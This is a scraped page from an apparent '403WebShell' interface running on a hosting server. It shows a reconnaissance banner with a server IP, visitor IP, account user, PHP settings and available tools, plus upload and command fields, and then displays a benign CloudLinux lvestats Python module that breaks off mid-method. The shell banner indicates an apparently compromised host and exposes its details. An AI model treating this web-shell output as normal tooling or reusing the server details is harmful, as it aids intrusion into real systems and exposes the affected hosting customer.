Failed to save the file to the "xx" directory.

Failed to save the file to the "ll" directory.

Failed to save the file to the "mm" directory.

Failed to save the file to the "wp" directory.

403WebShell
403Webshell
Server IP : 66.29.132.124  /  Your IP : 3.133.153.232
Web Server : LiteSpeed
System : Linux business141.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
User : wavevlvu ( 1524)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /opt/cloudlinux/venv/lib64/python3.11/site-packages/lvestats/lib/lveinfolib.py
# coding=utf-8
#
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2019 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# http://cloudlinux.com/docs/LICENSE.TXT

# pylint: disable=too-many-lines

import copy
import datetime
import logging
import pwd
import time
import warnings

from sqlalchemy import Float, Integer, text
from sqlalchemy import exc as sa_exc
from sqlalchemy.sql import and_, asc, desc, label, not_, or_, select
from sqlalchemy.sql.expression import ColumnElement, alias, case, cast, func

from lvestats.core.plugin import LveStatsPluginTerminated
from lvestats.lib.commons.dateutil import (
    gm_datetime_to_unixtimestamp,
    gm_to_local,
    local_to_gm,
    round_1m,
    str_to_timedelta,
    unixtimestamp_to_gm_datetime,
)
from lvestats.lib.commons.func import (
    get_current_max_lve_id,
    skip_user_by_maxuid,
)
from lvestats.lib.commons.sizeutil import convert_bytes, convert_powers_of_1000, mempages_to_bytes
from lvestats.lib.config import (
    HIDE_MAX_UID_LVE_PARAMETER,
    read_config,
    str_to_bool,
)
from lvestats.orm import LVE_STATS_2_TABLENAME_PREFIX, history, history_x60, servers

__all__ = ('HistoryShow', 'HistoryShowUnion', 'OutputFormatter', 'get_lve_version')


def get_lve_version(dbengine, server_id):
    sql_query_lve_version = select([servers.lve_version]).where(servers.server_id == server_id)
    with dbengine.begin() as transaction_:
        cursor_ = transaction_.execute(sql_query_lve_version)
        if cursor_.returns_rows:
            res = cursor_.fetchone()
            if res is None:
                return 6
            else:
                return int(res['lve_version'])
        else:
            return 6


def servers_info(dbengine):
    sql_query_lve_version = select([servers.server_id, servers.lve_version])
    return dbengine.execute(sql_query_lve_version)


def convert_key_to_label(key_):
    return str.lower(key_)


def add_labes_to_column(func_dict):
    """
    Add label (on SQL add ".. as ..") to aggregate_func_dict
    key of dict convert to lowercase and add as label
    :param dict func_dict:
    :return dict:
    """
    func_dict_labeled = {}
    for key_, sqlalchemy_func in list(func_dict.items()):
        if issubclass(sqlalchemy_func.__class__, ColumnElement):
            func_labeled = label(convert_key_to_label(key_), sqlalchemy_func)
        else:
            func_labeled = sqlalchemy_func
        func_dict_labeled[key_] = func_labeled
    return func_dict_labeled


def convert_to_list(arg):
    if isinstance(arg, (str, int)):
        return [arg]
    return arg


class OutputFormatter(object):
    def __init__(self, fields, rows=None, orders=None):
        self.rows = rows or []
        self.fields = list(fields)
        self._fields_lowered = [_.lower() for _ in fields]  # self.fields use for output
        self._orders = []
        self._hidden_fields = set()  # self._fields indexes list fields  to hide

        if orders:
            for field, order in orders:
                self.add_order(field, order)

    def get_fields(self):
        if self._hidden_fields:
            return [f_ for f_ in self.fields if f_ not in self._hidden_fields]
        else:
            return self.fields

    def set_rows(self, rows):
        """
        Use this method if you used hide_fields
        number items in row must bee same as in fields after hide
        """
        self.rows = rows

    def hide_fields(self, h_fields):
        """
        :param tuple|list h_fields:
        :return:
        """
        self._hidden_fields = self._hidden_fields.union(set(h_fields))

    def add_order(self, fields, order):
        """
        :param list|tuples fields:
        :param order: field to use to order result
        :return:
        """
        if isinstance(order, str):
            try:
                order = getattr(self, order)
            except AttributeError as e:
                raise ValueError(f'Non such {order} order') from e
            if not hasattr(order, '__call__'):
                raise ValueError(f'input object {order} must be callable')
        self._orders.append(({_.lower() for _ in fields}, order))

    def _convert_line(self, row_):
        """
        :param iterable row_:
        :return:
        """
        row_ = list(row_)
        row_out = []
        for field_, r_ in zip(self._fields_lowered, row_):
            if field_ in self._hidden_fields:  # continue if field must be hide
                continue
            # use many orders to one cell
            for order_fields, order in self._orders:
                if field_ in order_fields:
                    try:
                        r_ = order(r_)
                    except (TypeError, ValueError, KeyError, IndexError):
                        pass
            row_out.append(r_)
        return row_out

    def __iter__(self):
        for row_ in self.rows:
            yield self._convert_line(row_)

    def __getitem__(self, index):
        if isinstance(index, slice):
            return list(map(self._convert_line, self.rows[index.start: index.stop]))
        return self._convert_line(self.rows[index])

    def __len__(self):
        return len(self.rows)

    def get_corrected_list(self):
        return list(self)

    # build-in orders
    @staticmethod
    def strftime(value, format_='%m-%d %H:%M'):
        return value.strftime(format_)

    @staticmethod
    def percentage(value):
        if value is None:
            return '-'
        try:
            float(value)
        except ValueError:
            return value
        return str(value * 100) + '%'

    @staticmethod
    def bytes(value):
        if value is None:
            return '-'
        return convert_bytes(value)

    @staticmethod
    def powers_of_1000(value):
        if value is None:
            return '-'
        return convert_powers_of_1000(value)

    @staticmethod
    def username(value):
        try:
            return pwd.getpwuid(int(value)).pw_name
        except KeyError:
            return value

    @staticmethod
    def datetime(value):
        """
        Convert unix timestamp to datetime (local timezone)
        """
        return datetime.datetime.fromtimestamp(value)


def enumerate_duplicate_columns(columns):
    """
    Enumerate if columns name or functions are duplicated
    Use for force add duplicate columns to select operator
    :param list|tuple columns:
    :return list|tuple: enumerated columns
    """
    output = []
    output_str = []  # for controlling columns count
    for c_ in columns:
        c_str = str(c_)
        dubl_count = output_str.count(c_str)
        if dubl_count >= 1:  # check whether there is a duplicate; "c_ in columns" for sqlalchemy classes not work
            # check if column is string or function and get column name
            if isinstance(c_, str):
                c_name = c_
            else:
                c_name = c_.name

            # numbering duplicate columns
            c_name += '_' + str(dubl_count + 1)

            c_ = label(c_name, c_)  # rename column
        output.append(c_)
        output_str.append(c_str)
    return output


usage_to_limit_dict = {
    'aCPU'.lower(): 'lCPU'.lower(),
    'mCPU'.lower(): 'lCPU'.lower(),
    'aVMem'.lower(): 'lVMem'.lower(),
    'mVMem'.lower(): 'lVMem'.lower(),
    'aEP'.lower(): 'lEP'.lower(),
    'mEP'.lower(): 'lEP'.lower(),
    'aPMem'.lower(): 'lPMem'.lower(),
    'mPMem'.lower(): 'lPMem'.lower(),
    'aNproc'.lower(): 'lNproc'.lower(),
    'mNproc'.lower(): 'lNproc'.lower(),
    'aIO'.lower(): 'lIO'.lower(),
    'mIO'.lower(): 'lIO'.lower(),
    'aIOPS'.lower(): 'lIOPS'.lower(),
    'mIOPS'.lower(): 'lIOPS'.lower(),
}

FIELD_TO_TABLE_COLUMN = {
    'ID': 'id',
    'aCPU': 'cpu',
    'aVMem': 'mem',
    'aEP': 'mep',
    'aPMem': 'memphy',
    'aIO': 'io',
    'aNproc': 'nproc',
    'aIOPS': 'iops',
    'lCPU': 'cpu_limit',
    'lEP': 'mep_limit',
    'lVMem': 'mem_limit',
    'lPMem': 'lmemphy',
    'lIO': 'io_limit',
    'lNproc': 'lnproc',
    'lIOPS': 'liops',
    'VMemF': 'mem_fault',
    'PMemF': 'memphy_fault',
    'EPf': 'mep_fault',
    'NprocF': 'nproc_fault',
    'CPUf': 'cpu_fault',
    'IOf': 'io_fault',
    'IOPSf': 'iops_fault',
    'uCPU': 'cpu',
    'uEP': 'mep',
    'uVMem': 'mem',
    'uPMem': 'memphy',
    'uIO': 'io',
    'uNproc': 'nproc',
    'uIOPS': 'iops',
    'mCPU': 'cpu',
    'mEP': 'mep',
    'mVMem': 'mem',
    'mPMem': 'memphy',
    'mNproc': 'nproc',
    'mIO': 'io',
    'mIOPS': 'iops',
}

FIELD_AVERAGE = ['aCPU', 'aVMem', 'aPMem', 'aEP', 'aNproc', 'aIO', 'aIOPS']
FIELD_LIMIT = ['lCPU', 'lVMem', 'lPMem', 'lEP', 'lNproc', 'lIO', 'lIOPS']
FIELD_FAULT = ['CPUf', 'VMemF', 'PMemF', 'EPf', 'NprocF', 'IOf', 'IOPSf']
FIELD_USAGE = ['uCPU', 'uVMem', 'uPMem', 'uEP', 'uNproc', 'uIO', 'uIOPS']
FIELD_MAX = ['mCPU', 'mVMem', 'mPMem', 'mEP', 'mNproc', 'mIO', 'mIOPS']

KEYS_NORMALIZATION_LOOKUP_TABLE = {'FROM': 'From', 'TO': 'To', 'ANYF': 'anyF'}
for key in list(FIELD_TO_TABLE_COLUMN.keys()):
    KEYS_NORMALIZATION_LOOKUP_TABLE[key.upper()] = key


def normalize_optional_column_names(names):
    if names is None:
        return None
    return normalize_column_names(names)


def normalize_column_names(names):
    result = []
    for name in names:
        result.append(normalize_column_name(name))
    return result


def normalize_column_name(name):
    if name:
        return KEYS_NORMALIZATION_LOOKUP_TABLE[name.upper()]
    return None


time_unit_orders = [
    ('10m', lambda dt: dt - datetime.timedelta(minutes=dt.minute % 10 + 10)),
    ('1h', lambda dt: dt.replace(minute=0) if dt.minute else dt - datetime.timedelta(hours=1)),  # round to hour
    ('1d', lambda dt: dt.replace(hour=0, minute=0)),  # round to day
]


def dyn_time_unit_groups(period_from, period_to):
    period_groups = [round_1m(period_from), round_1m(period_to + datetime.timedelta(minutes=1))]
    time_unit_list = ['1m']
    _from_order_fun = round_1m
    for time_unit, order_fun in time_unit_orders:
        from_to_point = order_fun(period_groups[1])
        if from_to_point - period_groups[0] >= str_to_timedelta(time_unit):
            _from_order_fun = order_fun
            period_groups.insert(1, from_to_point)
            time_unit_list.append(time_unit)
    period_groups[0] = _from_order_fun(period_groups[0])
    # prepare to output as list of tuples
    # (<From|datetime>, <To|datetime>, <time-unit|int>)
    from_to_groups = []
    for index, time_unit in enumerate(time_unit_list):
        from_to_groups.append(
            (period_groups[-index - 2], period_groups[-index - 1], int(str_to_timedelta(time_unit).total_seconds()))
        )
    return from_to_groups


class HistoryShow(object):
    def __init__(
        self,
        dbengine,
        period_from,
        period_to,
        uid=None,
        show_columns=None,
        server_id='localhost',
        time_unit=None,
        order_by=None,
        by_usage=None,
        by_usage_percentage=0.9,
        by_fault=None,
        threshold=1,
        limit=0,
        table=None,
        log=None,
        time_count=None,
        show_idle=False,
    ):
        """
        Show different statistics from history table
        :param sqlalchemy.engine.base.Engine dbengine: database engine to use
        :param datetime.datetime|float|int period_from:  start time retrieve data
        :param datetime.datetime|float|int period_to:    end time retrieve data
        :param int|None|list|tuple uid:                  filter the output information to the user uid
        :param tuple|list show_columns:        display columns in the order specified. If not, show all supported
                valid column names: 'aCPU', 'lPMem', 'uIO', 'uEP', 'lEP', 'aVMem', 'PMemF', 'lVMem', 'NprocF', 'anyF',
                'aNproc', 'VMemF', 'ID', 'lCPU', 'aIOPS', 'aEP', 'aPMem', 'uPMem', 'lIO', 'lIOPS', 'uCPU',
                'lNproc', 'aIO', 'uIOPS', 'EPf', 'uVMem', 'uNproc'

        :param str server_id:                  filtering the output for "server id"
        :param int time_unit:                  grouping output over an interval of time (in seconds)
        :param str|None order_by:              sorting output by column name (supported by columns)
        :param str|tuple|list by_usage:        filtering are grouped data for the percentage of the use of resources
        :param float by_usage_percentage:      percent for the parameter setting 'by_usage'
        :param tuple|list|None by_fault:       filtering data are grouped for quantity faults
                                               (None if it is not filtered)
            valid names: 'aCPU', 'lPMem', 'uIO', 'uEP', 'lEP', 'aVMem', 'PMemF', 'lVMem', 'NprocF', 'anyF', 'aNproc',
            'VMemF', 'ID', 'lCPU', 'aIOPS', 'aEP', 'aPMem', 'uPMem', 'lIO', 'lIOPS', 'uCPU', 'lNproc', 'aIO', 'uIOPS',
            'EPf', 'uVMem', 'uNproc'
        :param threshold:                      number faults for filtering the data are grouped
                                               (used together with by_fault)
        :param int|None limit:                 limit on the number of output data
                                               (if 0 or None, then the limit is not set)
        :return generator:                     returns a list/generator of data with the order set out
                                               in the 'show_columns'
        """
        self.dbengine = dbengine
        self.uid = uid
        self._is_multi_uids = not isinstance(uid, int)
        if show_columns is None:
            show_columns = get_supported_columns(lve_version=get_lve_version(dbengine=dbengine, server_id=server_id))
            show_columns.insert(0, 'ID')
        self.show_columns = normalize_column_names(show_columns)
        self.server_id = server_id
        self.time_unit = time_unit
        self.by_fault = normalize_optional_column_names(by_fault)
        if order_by:
            self.order_by = normalize_column_name(order_by)
        elif self.by_fault and normalize_column_name('anyF') in self.by_fault:
            self.order_by = normalize_column_name('CPUf')
        else:
            self.order_by = self.by_fault and self.by_fault[0]
        self.by_usage = normalize_optional_column_names(by_usage)
        self.by_usage_percentage = by_usage_percentage
        self.threshold = threshold
        self.limit = limit
        self.log = log or logging.getLogger('SQL')

        self.table = table if table is not None else history.__table__  # "or" not supported in this
        self._table_alive = alias(self.table, 'alive')  # alias of main table to using in self join
        self.period_from = (
            period_from if isinstance(period_from, (int, float)) else gm_datetime_to_unixtimestamp(period_from)
        )
        self.period_to = period_to if isinstance(period_to, (int, float)) else gm_datetime_to_unixtimestamp(period_to)
        self.time_count = time_count or self.get_time_count()
        # correct cpu/100
        # we still have to round it, as it seems <[27.333/100] = [0.27332999999999996] - who knows why :(
        self.result_corrector = OutputFormatter(
            fields=self.show_columns,
            orders=[
                [FIELD_MAX + FIELD_AVERAGE + FIELD_LIMIT + FIELD_USAGE, lambda x: round(x, 3)],
                [['aCPU', 'lCPU', 'mCPU'], lambda item: round(float(item) / 100.0, 5)],
            ],
        )
        self.hide_maxuid_lve = str_to_bool(read_config().get(HIDE_MAX_UID_LVE_PARAMETER, 'true'))

    def set_normalised_output(self):
        # correct data obtained from database
        # round EP IOPS Nproc output
        self.result_corrector.add_order(
            fields=['aEP', 'mEP', 'lEP', 'aNproc', 'mNproc', 'lNproc', 'aIOPS', 'mIOPS', 'lIOPS'],
            order=lambda x: int(round(x)),
        )
        if self.dbengine.url.drivername != "sqlite":
            self.result_corrector.add_order(
                fields=[
                    'aVMem',
                    'mVMem',
                    'lVMem',
                    'aPMem',
                    'mPMem',
                    'lPMem',
                    'aIO',
                    'mIO',
                    'lIO',
                    'uCPU',
                    'uEP',
                    'uVMem',
                    'uPMem',
                    'uIO',
                    'uNproc',
                    'uIOPS',
                ],
                order=float,
            )
            self.result_corrector.add_order(
                fields=['EPf', 'VMemF', 'CPUf', 'PMemF', 'NprocF', 'IOf', 'IOPSf'], order=int
            )

        # convert Mem to bytes
        self.result_corrector.add_order(
            fields=['aVMem', 'mVMem', 'lVMem', 'aPMem', 'mPMem', 'lPMem'], order=mempages_to_bytes
        )

    def _where_time_period(self, table=None):
        """
        Generate WHERE created BETWEEN xxxxxxxxx AND yyyyyyyy
        :return:
        """
        # filtering condition by time period
        if table is None:
            table = self.table
        return table.c.created.between(self.period_from, self.period_to)

    def _where_server_id(self):
        """
        Generate WHERE server_id = 'server_name'
        :return:
        """
        return self.table.c.server_id == self.server_id

    def _where_uid(self, uid=-1, table=None):
        """Generate WHERE id = 'user_uid'"""
        if table is None:
            table = self.table
        if uid == -1:
            uid = self.uid

        if uid is None:
            if self.hide_maxuid_lve:
                # skip ids in range(MAX_UID, MAX_LVE_ID), because ids > MAX_LVE_ID may contain info
                # about reseller`s limits
                return and_(
                    table.c.id > 0, or_(not_(skip_user_by_maxuid(table.c.id)), table.c.id > get_current_max_lve_id())
                )
            return table.c.id > 0

        elif isinstance(uid, (list, tuple)):
            if self.dbengine.url.drivername == 'sqlite':
                # little workaround for sqlite's limit of 999 variables
                # let's compile query manually
                return text(table.c.id.in_(list(uid)).expression.compile(compile_kwargs={"literal_binds": True}).string)
            else:
                # mysql or postgresql do not have such limit
                return table.c.id.in_(list(uid))
        else:
            return table.c.id == uid

    def get_time_count(self):
        """
        SELECT count(*) FROM lve_stats2_history WHERE id = 0 AND created BETWEN xxxx AND yyyy server_id = 'localhost'
        """
        where = and_(
            history.created.between(self.period_from, self.period_to),
            history.id == 0,
            history.server_id == self.server_id,
        )
        query = select([text('count(*)')]).where(where)
        time_start = time.time()
        q = str(query.compile(compile_kwargs={"literal_binds": True})).replace('\n', ' ')
        self.log.debug(q)
        data = self.dbengine.execute(query)
        self.log.debug('query time: %s', time.time() - time_start)
        return data.fetchall()[0][0]

    def _fun_avg(self, item):
        """
        Generate aggregate function for calculate average
        for example sum(lve_stats2_history.cpu) / 60
        :param item:
        :return:
        """
        return cast(func.sum(item) / cast(self._fun_time_count(), Float), Float)

    def _fun_limit(self, item):
        """
        Generate aggregate function for calculate limit
        if column_limit is zero its mean no limit
        for example CASE WHEN (min(lve_stats2_history.cpu_limit) > 0) THEN max(lve_stats2_history.cpu_limit) ELSE 0 END
        :param item:
        :return:
        """
        return case([(func.min(item) > 0, func.max(item))], else_=0)

    def _fun_fault(self, item):
        """
        Generate aggregate function for calculate fault
        for example sum(lve_stats2_history.cpu_fault)
        :param item:
        :return:
        """
        return func.sum(item)

    def _fun_usage(self, item, item_limit):
        """
        Generate aggregate function for calculate resource usage equivalent average/limit
        for example
            CASE
                WHEN (
                    CASE
                        WHEN min(lve_stats2_history.cpu_limit) > 0 THEN max(lve_stats2_history.cpu_limit)
                        ELSE 0
                    END IS NULL
                ) THEN NULL
                WHEN (
                    CASE
                        WHEN min(lve_stats2_history.cpu_limit) > 0 THEN max(lve_stats2_history.cpu_limit)
                        ELSE 0
                    END > 0
                ) THEN (
                    sum(lve_stats2_history.cpu) / 1422
                ) / CASE
                        WHEN min(lve_stats2_history.cpu_limit) > 0 THEN max(lve_stats2_history.cpu_limit)
                        ELSE 0
                    END
            END
        :param item:
        :return:
        """
        # noinspection PyComparisonWithNone
        return case(
            [
                # Don't use "is None" here.
                (self._fun_limit(item_limit) == None, None),  # NOQA
                (self._fun_limit(item_limit) > 0, self._fun_avg(item) / self._fun_limit(item_limit)),
            ],
            else_=None,
        )

    def _fun_max(self, item, item_limit, item_fault):
        """
        Generate aggregate function for calculate maximum resource usage; for backward capability with lve-stats 0.x
        for example:
            CASE
                WHEN
                    (sum(lve_stats2_history.cpu_fault) > 0)
                THEN
                    max(lve_stats2_history.cpu_limit)
                ELSE
                    max(lve_stats2_history.cpu) END
        :param item:
        :param item_limit:
        :param item_fault:
        :return:
        """
        return case([(func.sum(item_fault) > 0, func.max(item_limit))], else_=func.max(item))

    def _fun_time_count(self):
        if self._check_need_join():
            return text('count(*)')
        else:
            return self.time_count

    def _fun_time_from(self):
        if self._is_multi_uids:
            return self.period_from
        else:
            if self._check_need_join():
                _table = self._table_alive
            else:
                _table = self.table
            if self.dbengine.url.drivername == 'sqlite':
                # cast(..., Integer) using for compatibility with lve-stats-2.1-8 database; 'created' saved as float
                return (
                    cast((_table.c.created - self.period_from) / self.time_unit, Integer) * self.time_unit
                    + self.period_from
                )
            else:
                return (
                    func.floor((_table.c.created - self.period_from) / self.time_unit) * self.time_unit
                    + self.period_from
                )

    def _fun_time_to(self):
        # in case of changes here don't forget to check _group_by_query
        if self._is_multi_uids:
            return self.period_to
        else:
            return self._fun_time_from() + self.time_unit

    def _fun_user_id(self):
        if self._is_multi_uids:
            return label('ID', self.table.c.id)
        else:
            return label('ID', text(str(self.uid)))

    def _aggregate_fun_case(self, item):
        """
        Function for obtain aggregate function (or column name) by column name
        :param item: 'aCPU', 'aVMem', 'aPMem', 'aEP', 'aNproc',  'aIO', 'aIOPS', 'lCPU', 'lVMem', 'lPMem', 'lEP',
                     'lNproc',  'lIO', 'lIOPS', 'CPUf', 'VMemF', 'PMemF', 'EPf', 'NprocF',  'IOf', 'IOPSf', 'uCPU',
                     'uVMem', 'uPMem', 'uEP', 'uNproc',  'uIO', 'uIOPS', 'mCPU', 'mVMem', 'mPMem', 'mEP',  'mNproc',
                     'mIO', 'mIOPS', 'anyF', 'ID', 'From', 'To'
        :type item: str
        :return:
        """
        if item == 'anyF':
            fun_ = func.sum(
                self.table.c.mem_fault
                + self.table.c.memphy_fault
                + self.table.c.mep_fault
                + self.table.c.nproc_fault
                + self.table.c.cpu_fault
                + self.table.c.io_fault
                + self.table.c.iops_fault
            )
        elif item == 'ID':
            fun_ = self._fun_user_id()
        elif item == 'From':
            fun_ = self._fun_time_from()
        elif item == 'To':
            fun_ = self._fun_time_to()
        else:
            column_name = FIELD_TO_TABLE_COLUMN[item]
            table_column = getattr(self.table.c, column_name)
            if item in FIELD_AVERAGE:
                fun_ = self._fun_avg(table_column)
            elif item in FIELD_LIMIT:
                fun_ = self._fun_limit(table_column)
            elif item in FIELD_FAULT:
                fun_ = self._fun_fault(table_column)
            elif item in FIELD_USAGE:
                column_name_limit = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[FIELD_USAGE.index(item)]]
                table_column_limit = getattr(self.table.c, column_name_limit)
                fun_ = self._fun_usage(table_column, table_column_limit)
            elif item in FIELD_MAX:
                column_name_limit = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[FIELD_MAX.index(item)]]
                column_name_fault = FIELD_TO_TABLE_COLUMN[FIELD_FAULT[FIELD_MAX.index(item)]]
                table_column_limit = getattr(self.table.c, column_name_limit)
                table_column_fault = getattr(self.table.c, column_name_fault)
                fun_ = self._fun_max(table_column, table_column_limit, table_column_fault)
        return fun_

    def _group_by_query(self, select_query):
        by_usage_list = convert_to_list(self.by_usage)
        by_fault_list = convert_to_list(self.by_fault)
        if self._is_multi_uids:
            query = select_query.group_by(self.table.c.id)
        else:
            # it is correct because in query result all records having the same _fun_time_from()
            # also have same _fun_time_to()
            # so .group_by(_fun_time_to()) doesn't create new groups after .group_by(_fun_time_from())
            # but we need both this group conditions because mysql throws an error otherwise
            query = select_query.group_by(self._fun_time_from()).group_by(self._fun_time_to())
        if self.order_by:
            order_by_aggregate_func = self._aggregate_fun_case(self.order_by)
            query.append_order_by(desc(order_by_aggregate_func))
        else:
            if self._is_multi_uids:
                query.append_order_by(asc(self.table.c.id))
            else:
                query.append_order_by(self._fun_time_from())

        # add filter for having grouped data
        if by_usage_list:  # add filtering by user id
            filter_fun_list = []
            for item in by_usage_list:
                if item in FIELD_AVERAGE:
                    index = FIELD_AVERAGE.index(item)
                    filter_fun = self.by_usage_percentage <= self._aggregate_fun_case(FIELD_USAGE[index])
                else:
                    index = FIELD_MAX.index(item)
                    filter_fun = self.by_usage_percentage * self._aggregate_fun_case(
                        FIELD_LIMIT[index]
                    ) <= self._aggregate_fun_case(item)
                filter_fun_list.append(filter_fun)
            query.append_having(or_(*filter_fun_list))

        if by_fault_list:
            by_fault_filter = [self.threshold <= self._aggregate_fun_case(funk_key_) for funk_key_ in by_fault_list]
            query.append_having(or_(*by_fault_filter))
        if self.limit != 0 and self.limit is not None:
            query = query.limit(self.limit)

        return query

    def _columns_query(self):
        """
        Generate output columns for SELECT <_columns_query(self)> FROM ...
        :return:
        """
        columns_agregate_func = []
        for column_key in self.show_columns:
            column_fun = self._aggregate_fun_case(column_key)
            if isinstance(column_fun, list):
                columns_agregate_func.extend(column_fun)
            else:
                if column_key not in ('From', 'To'):  # digest not support label
                    column_fun = label(column_key, column_fun)
                columns_agregate_func.append(column_fun)  # add label
        return columns_agregate_func

    def _check_need_time_count(self):
        columns = {
            'aCPU',
            'uCPU',
            'aEP',
            'uEP',
            'aVMem',
            'uVMem',
            'aPMem',
            'uPMem',
            'aNproc',
            'uNproc',
            'aIO',
            'uIO',
            'aIOPS',
            'uIOPS',
        }
        return bool(columns & (set(self.show_columns) | {self.order_by} | set(self.by_usage or set())))

    def _check_need_join(self):
        return self._check_need_time_count() and not self._is_multi_uids

    def select_query(self, columns_=None, need_join=False):
        """
        :type need_join: bool
        """
        if columns_ is None:
            columns_ = self._columns_query()
        if need_join:
            where_query = and_(
                self._where_time_period(table=self._table_alive), self._where_uid(uid=0, table=self._table_alive)
            )
        else:
            where_query = and_(self._where_time_period(), self._where_uid())
        if self.server_id:  # add filtering by server id
            where_query = and_(where_query, self._where_server_id())
        query = select(columns_).where(where_query)
        if need_join:
            _table_joined = self._table_alive.outerjoin(
                self.table, and_(self._table_alive.c.created == self.table.c.created, self._where_uid(uid=self.uid))
            )
            query = query.select_from(_table_joined)
        return query

    def main_query(self):
        columns_ = self._columns_query()
        query = self.select_query(columns_=columns_, need_join=self._check_need_join())
        query = self._group_by_query(query)
        return query

    def _min_max_created(self):
        """
        SELECT
            MIN(created) AS MinCreated,
            MAX(created) AS MaxCreated
        FROM
            lve_stats2_history
        WHERE
            id = <ID> AND
            created BETWEEN 'xxxx' AND 'yyyy' AND
            server_id = 'localhost';
        """
        where_query = and_(self._where_time_period(), self._where_uid(), self._where_server_id())
        query = select([func.min(self.table.c.created), func.max(self.table.c.created)]).where(where_query)
        time_start = time.time()
        q = str(query.compile(compile_kwargs={"literal_binds": True})).replace('\n', ' ')
        self.log.debug(q)
        data = self.dbengine.execute(query)
        self.log.debug('query time: %s', time.time() - time_start)
        return data.fetchall()[0]

    def proceed_dyn_time_unit(self):
        min_created, max_created = self._min_max_created()
        if max_created is None:  # no data
            return self.result_corrector
        # we need manipulate with datetime data in local timezone
        period_from = gm_to_local(unixtimestamp_to_gm_datetime(min_created))
        period_to = gm_to_local(unixtimestamp_to_gm_datetime(max_created))
        time_unit_groups = dyn_time_unit_groups(period_from, period_to)

        rows = []
        for _from, _to, _time_unit in reversed(time_unit_groups):
            # create instance copy for modify some attributes
            self_copy = copy.copy(self)
            self_copy.period_from = gm_datetime_to_unixtimestamp(local_to_gm(_from))
            self_copy.period_to = gm_datetime_to_unixtimestamp(local_to_gm(_to)) - 1
            self_copy.time_unit = _time_unit
            self_copy.limit = 0
            rows.extend(self_copy.proceed())
        return rows

    def proceed(self):
        # check and return some data without run sql query
        if self.uid == tuple() or self.uid == []:
            return []
        if self.uid is not None and not isinstance(self.uid, (list, tuple)) and self.uid <= 0:
            return []

        query = self.main_query()
        time_start = time.time()
        q = str(query.compile(compile_kwargs={"literal_binds": True}))
        self.log.debug(q.replace('\n', ' '))
        conn = self.dbengine.connect()
        try:
            cursor = conn.execute(query)
            self.log.debug('query time: %s', time.time() - time_start)
            self.result_corrector.rows = cursor.fetchall()
        except LveStatsPluginTerminated as e:
            conn.close()
            raise LveStatsPluginTerminated() from e
        else:
            conn.close()
            return self.result_corrector

    def proceed_dict(self):
        return [dict(zip(self.show_columns, items_val)) for items_val in self.proceed()]


class _HistoryShowX1(HistoryShow):
    def __init__(self, *args, **kwargs):
        HistoryShow.__init__(self, *args, **kwargs)
        if 'ID' not in self.show_columns:
            self.show_columns = ['ID'] + self.show_columns
        self._labels = []  # variable for control duplicated labels

    def _aggregate_fun_case(self, item):
        """
        :type item: str
        """
        if item == 'anyF':
            fun_ = [
                self.table.c.mem_fault,
                self.table.c.memphy_fault,
                self.table.c.mep_fault,
                self.table.c.nproc_fault,
                self.table.c.cpu_fault,
                self.table.c.io_fault,
                self.table.c.iops_fault,
            ]
        elif item == 'ID':
            fun_ = label('id', self.table.c.id)
        elif item == 'From':
            fun_ = self.period_from
        elif item == 'To':
            fun_ = self.period_to
        else:
            column_name = FIELD_TO_TABLE_COLUMN[item]
            table_column = getattr(self.table.c, column_name)
            if item in (FIELD_AVERAGE + FIELD_LIMIT + FIELD_FAULT):
                fun_ = label(column_name, table_column)
            elif item in FIELD_USAGE:
                column_name_limit = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[FIELD_USAGE.index(item)]]
                table_column_limit = label(column_name_limit, getattr(self.table.c, column_name_limit))
                fun_ = [table_column, table_column_limit]
            elif item in FIELD_MAX:
                column_name_limit = FIELD_TO_TABLE_COLUMN[FIELD_LIMIT[FIELD_MAX.index(item)]]
                column_name_fault = FIELD_TO_TABLE_COLUMN[FIELD_FAULT[FIELD_MAX.index(item)]]
                table_column_fault = label(column_name_fault, getattr(self.table.c, column_name_fault))
                table_column_limit = label(column_name_limit, getattr(self.table.c, column_name_limit))
                table_column_max = label(column_name + '_max', table_column)
                fun_ = [table_column, table_column_limit, table_column_fault, table_column_max]
        return fun_

    def _columns_query(self):
        columns_agregate_func = []

        show_columns = self.show_columns + (self.by_fault or [])
        if self.by_usage:
            for item in convert_to_list(self.by_usage):
                if item in FIELD_AVERAGE:
                    index = FIELD_AVERAGE.index(item)
                    show_columns.append(FIELD_USAGE[index])
                else:
                    index = FIELD_MAX.index(item)
                    show_columns.extend([FIELD_FAULT[index], item])

        if self.order_by:
            show_columns.append(self.order_by)

        for column_key in show_columns:
            column_fun = self._aggregate_fun_case(column_key)
            if isinstance(column_fun, list):
                for fun_ in column_fun:
                    if hasattr(fun_, 'name') and fun_.name not in self._labels:  # prevent alias duplication
                        columns_agregate_func.append(fun_)
                        self._labels.append(fun_.name)
            else:
                if hasattr(column_fun, 'name') and column_fun.name not in self._labels:  # prevent alias duplication
                    columns_agregate_func.append(column_fun)
                    self._labels.append(column_fun.name)
        return columns_agregate_func


class _HistoryShowX60(_HistoryShowX1):
    AGGREGATE_PERIOD = 60 * 60

    def __init__(self, *args, **kwargs):
        _HistoryShowX1.__init__(self, *args, table=history_x60.__table__, **kwargs)

        # correct and rewrite time count and period
        self.period_from, self.period_to = self.get_history_x60_from_to()
        self.time_count = kwargs.get('time_count') or self.get_time_count()

    def get_time_count(self):
        if (self.period_from, self.period_to) == (None, None):
            return 0
        return _HistoryShowX1.get_time_count(self)

    def get_history_x60_from_to(self):
        """
        calculate present in aggregate table from and to time
        """
        if self.period_to - self.period_from <= self.AGGREGATE_PERIOD:
            return None, None
        between_query = self.table.c.created.between(self.period_from + self.AGGREGATE_PERIOD, self.period_to)
        query = select([func.min(self.table.c.created), func.max(self.table.c.created)]).where(
            and_(between_query, self._where_server_id())
        )
        time_start = time.time()
